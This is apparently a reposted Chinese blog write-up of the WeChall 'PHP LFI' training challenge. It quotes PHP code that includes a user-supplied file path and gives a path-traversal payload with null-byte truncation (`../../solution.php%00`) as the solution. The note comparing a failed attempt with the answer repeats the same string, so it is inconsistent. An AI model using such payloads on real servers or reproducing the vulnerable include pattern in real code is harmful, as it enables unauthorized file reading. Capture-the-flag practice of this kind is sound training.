码迷,mamicode.com
首页 > Web开发 > 详细

WeChall_Training: PHP LFI (Exploit, PHP, Training)

时间:2016-09-08 18:32:38      阅读:313      评论:0      收藏:0      [点我收藏+]

标签:

Your mission is to exploit this code, which has obviously an LFI vulnerability:

GeSHi`ed PHP code
1
2
$filename = ‘pages/‘.(isset($_GET["file"])?$_GET["file"]:"welcome").‘.html‘;
include $filename;



There is a lot of important stuff in ../solution.php, so please include and execute this file for us.

Here are a few examples of the script in action (in the box below):
index.php?file=welcome
index.php?file=news
index.php?file=forums

For debugging purposes, you may look at the whole source again, also as highlighted version.

 

解题:

  因为字符串后面加了个".html",完全不知道怎么处理,去搜了题解,发现可以用%00来截断,然后就试了下?file=../../solution.php%00,发现不存在这个文件,看了题解发现是?file=../../solution.php%00。。

 

WeChall_Training: PHP LFI (Exploit, PHP, Training)

标签:

原文地址:http://www.cnblogs.com/zhurb/p/5853831.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!